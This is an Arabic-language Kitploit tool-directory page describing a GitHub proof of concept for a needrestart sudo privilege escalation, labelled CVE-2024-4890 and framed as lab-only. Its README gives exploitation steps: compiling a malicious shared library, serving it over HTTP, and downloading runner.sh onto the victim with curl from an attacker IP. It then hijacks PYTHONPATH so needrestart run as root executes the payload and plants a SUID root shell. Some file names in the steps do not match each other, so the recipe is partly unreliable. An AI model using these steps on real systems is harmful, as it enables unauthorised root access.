Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/nekr0ff/needrestart-sudo-escalate-cve-2024-4890
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليماستغلال الملفات الثنائيةمختبرات وتدريب عملي
GitHubnekr0ff/needrestart-sudo-escalate-cve-2024-4890

needrestart-sudo-escalate-cve-2024-4890

استغلال PoC لـ CVE-2024-4890: تصعيد صلاحيات Sudo عبر neecdrestart (>=3.8). للاستخدام الأخلاقي في المختبرات فقط. سكريبتات بلغة Python و C.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 9 أشهرلم تتم المراجعة بعد

CVE-2024-4890: needrestart Sudo تصعيد الصلاحيات PoC

CVE-2024-4890 License: MIT

إخلاء مسؤولية

للاستخدام المخبري فقط في بيئات خاضعة للتحكم. لا تستغل على أنظمة الإنتاج دون إذن صريح. إثبات المفهوم هذا لأغراض تعليمية فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو وصول غير مصرح به.

نظرة عامة

CVE-2024-4890 هي ثغرة أمنية خطيرة في needrestart (الإصدارات >= 3.8) تتيح تنفيذ تعليمات برمجية عشوائية بصلاحيات مرتفعة. ينبع العيب من المعالجة غير الآمنة لمتغيرات البيئة وملفات التهيئة أثناء فحص العمليات.

على وجه التحديد، عند تشغيل needrestart باستخدام sudo، فإنه يفحص عمليات بايثون الجارية، بما في ذلك متغير البيئة PYTHONPATH الخاص بها. يمكن للمهاجم اختطاف ذلك عن طريق تعيين PYTHONPATH مخصص يشير إلى دليل مسيطر عليه (مثل /tmp/attacker). داخل هذا الدليل، يتم وضع وحدة ضارة (__init__.so) في هيكل importlib مزيف. عندما يحاول needrestart استيرادها كجذر (لفحص المكتبات)، يتم تنفيذ الحمولة، مما يمنح وصولاً كجذر.

يوضح إثبات المفهوم هذا الاستغلال من خلال عملية بايثون خادعة، ومكتبة مشتركة ضارة (مجمعة من C)، ونص برمجي للتشغيل الآلي.

المتطلبات الأساسية

  • الهدف: نظام لينكس مثبت عليه needrestart >= 3.8 ولديه صلاحيات sudo له.
  • الأدوات: gcc (للتجميع)، curl، python3.

هيكل الملفات

ضع هذه الملفات داخل /tmp/attacker على الجهاز الهدف.

  • e.py: نص بايثون خادع (يعمل في حلقة، وينتظر نجاح الحمولة).
  • runner.sh: نص برمجي للتشغيل الآلي لإعداد وتشغيل الخدعة.

خطوات الاستغلال

  1. جهاز المهاجم: قم بتجميع lib.c إلى __init__.so واستضافته:

gcc -shared -fPIC -o init.so lib.c

python3 -m http.server 8000

الجهاز الهدف (الضحية):

  • أنشئ الدليل /tmp/attacker.
  • انسخ الملف main.py.
  • قم بتنزيل وجعل runner.sh قابلاً للتنفيذ:
root@kitploit:~
curl http://<ATTACKER_IP>:<PORT>/runner.sh -o /tmp/attacker/runner.sh
chmod +x /tmp/attacker/runner.sh

شغّل الإعداد في محطة طرفية واحدة: cd /tmp/attacker && ./runner.sh

يقوم هذا بإنشاء الوحدة الضارة، النص الخادع، ويبدأ عملية بايثون المختطفة.

  1. تشغيل الفحص (في جلسة SSH جديدة): sudo /usr/sbin/needrestart

يكتشف needrestart العملية الخادعة، ويقرأ PYTHONPATH، ويستورد الملف __init__.so الضار كجذر—منفذاً الحمولة.

  1. جمع الوصول (مرة أخرى في محطة runner.sh):
  • يكتشف النص /tmp/poc (صدفة جذر SUID تم إنشاؤها بواسطة الحمولة) ويطلق صدفة جذر: sudo /tmp/poc -p التنظيف: rm -rf /tmp/attacker /tmp/poc (وأزل إدخال sudoers إذا تمت إضافته).

مؤشر النجاح: يظهر الأمر whoami الناتج root أو يظهر الأمر id الناتج uid=0(root).

تنزيل الأداة